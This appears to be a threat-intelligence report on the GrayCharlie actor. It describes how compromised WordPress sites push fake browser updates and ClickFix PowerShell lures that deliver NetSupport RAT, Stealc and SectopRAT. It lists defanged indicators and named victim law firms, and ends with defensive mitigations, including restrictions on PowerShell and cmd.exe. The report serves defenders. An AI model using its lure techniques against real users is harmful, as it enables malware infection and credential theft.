Full Report
GrayCharlie turns compromised WordPress sites into malware delivery machines. Discover how this threat actor chains fake browser updates and ClickFix lures to deploy NetSupport RAT, Stealc, and SectopRAT.
Analysis Summary
# Threat Actor: GrayCharlie
## Attribution & Identity
**GrayCharlie** is a threat activity group that has been active since at least mid-2023. Insikt Group identifies significant overlaps between GrayCharlie and other tracked entities, including:
* **Known Aliases:** SmartApeSG, ZPHP, and HANEYMANEY.
* **Associated Groups:** Potential overlaps with actors utilizing "ClickFix" social engineering kits.
* **Identity:** While specific individuals are not named, the actor utilizes distinct infrastructure clusters (likely managed by different associates) primarily hosted on MivoCloud and HZ Hosting Ltd.
## Activity Summary
GrayCharlie specializes in compromising WordPress websites to serve as a launchpad for malware. Mid-2023 to early 2024 operations focused on **Fake Browser Update** lures (Chrome, Edge, Firefox). In March/April 2025, the actor shifted tactics to **ClickFix** mechanisms—convincing users to copy/paste malicious PowerShell scripts into their system terminal to "fix" a browser error. These campaigns primarily deliver **NetSupport RAT**, which often serves as a precursor to secondary payloads like **Stealc** (infostealer) and **SectopRAT**.
## Tactics, Techniques & Procedures
* **Resource Development:** High-volume deployment of C2 infrastructure and acquisition of TLS certificates for NetSupport clusters.
* **Initial Access:** Compromise of WordPress sites (possibly via vulnerability exploitation or supply-chain compromise of IT providers).
* **Execution:**
* **Fake Updates:** JavaScript injections prompting users to download malicious "browser updates."
* **ClickFix:** Social engineering lures that trick victims into executing malicious code via the Windows Run dialog or PowerShell.
* **Command and Control:** Large-scale use of NetSupport RAT for remote administration.
* **MITRE ATT&CK IDs:**
* T1189 (Drive-by Compromise)
* T1204.002 (User Execution: Malicious File)
* T1584.004 (Compromise Infrastructure: Server)
* T1219 (Remote Access Software)
## Targeting
* **Sectors:** Primarily opportunistic, spanning numerous industries; however, a specific 2025 campaign focused on the **Legal Sector**.
* **Geography:** Global distribution with a heavy concentration of targets in the **United States**.
* **Victims:** Specific US-based law firms including bianchilawgroup[.]com, brattonlawgroup[.]com, fisherstonelaw[.]com, and gerlinglaw[.]com, likely via a shared IT provider supply-chain attack.
## Tools & Infrastructure
* **Malware Families:**
* **NetSupport RAT:** Primary remote access tool.
* **Stealc:** Information stealer for harvesting credentials/data.
* **SectopRAT (Arechclient2):** Follow-on RAT for persistent access.
* **Infrastructure:**
* **Hosting:** Heavy usage of MivoCloud and HZ Hosting Ltd.
* **C2 IPs:** 85[.]158[.]110[.]179 (SectopRAT).
* **Staging Domains:** husinhthaidanphuong[.]top, kingdomholding[.]top, mindsetgrowth[.]shop, linksoflondononsale[.]top.
* **Associated Email:** oreshnik[@]mailum[.]com.
## Implications
GrayCharlie represents a persistent and evolving threat with a focus on both quantity and quality. The shift to ClickFix indicates an actor that stays current with effective social engineering trends. The targeted compromise of US law firms suggests a possible shift toward higher-value targets, where the data stolen via Stealc or SectopRAT could be used for financial gain, extortion, or the sale of access to other cybercriminals.
## Mitigations
* **Web Defenses:** Block connections to known compromised WordPress domains and "staging" domains used for JavaScript delivery.
* **Endpoint Controls:** Restrict or monitor the use of administrative tools like PowerShell and `cmd.exe`, especially when initiated via a browser process.
* **User Training:** Train employees to recognize "Fake Update" and "ClickFix" lures; emphasize that legitimate browser updates never require manual PowerShell execution.
* **Monitoring:** Deploy YARA and Sigma rules to detect NetSupport RAT artifacts and SectopRAT execution. Monitor for unauthorized data exfiltration to known MivoCloud/HZ Hosting IP ranges associated with C2.